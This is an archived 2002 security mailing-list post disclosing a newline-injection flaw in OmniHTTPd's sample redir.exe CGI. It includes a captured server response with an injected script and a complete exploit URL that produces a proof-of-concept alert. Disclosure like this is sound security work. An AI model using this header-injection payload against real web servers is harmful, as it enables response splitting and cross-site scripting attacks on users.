OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Matthew Murphy (mattmurphy_at_kc.rr.com)
Date: Sun Aug 25 2002 - 11:50:11 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I've discovered another vulnerability in one of the OmniHTTPd sample apps.
    This time, the culprit is "/cgi-bin/redir.exe". This app is vulnerable to a
    newline injection issue. The vulnerability occurs because the "URL" query
    parameter (case sensitive) is decoded and placed directly into the response
    as the "Location" header. If an attacker places urlencoded newlines
    ("%0D%0A") into the parameter, the headers following the "Location" header,
    as well as the resultant entity, can be controlled.

    I had a tough time exploiting this vulnerability to add headers, because
    OmniHTTPd would not add my header. :-( However, I was able to exploit this
    vulnerability to produce the following output:

    [Begin Server Response]
    HTTP/1.0 302 Redirection
    Content-Type: text/html
    Date: Sun, 25 Aug 2002 16:36:39 GMT
    Location: http://www.yahoo.com/
    Server: OmniHTTPd/2.10

    <script>alert(document.URL)</script>

    [End Server Response]

    This will pop up an alert, and then redirect to yahoo.com on browsers that
    display redirect entities (IE will not work for this)

    I was a bit puzzled by the "Server" header between the Location and the
    entity, but I figured out that OmniHTTPd was inserting the header after CGI
    processing was complete.

    Exploit URL:

    http://localhost/cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Eyahoo%2Ecom%2F%0D%
    0A%0D%0A%3CSCRIPT%3Ealert%28document%2EURL%29%3C%2FSCRIPT%3E

    "The reason the mainstream is thought
    of as a stream is because it is
    so shallow."
                         - Author Unknown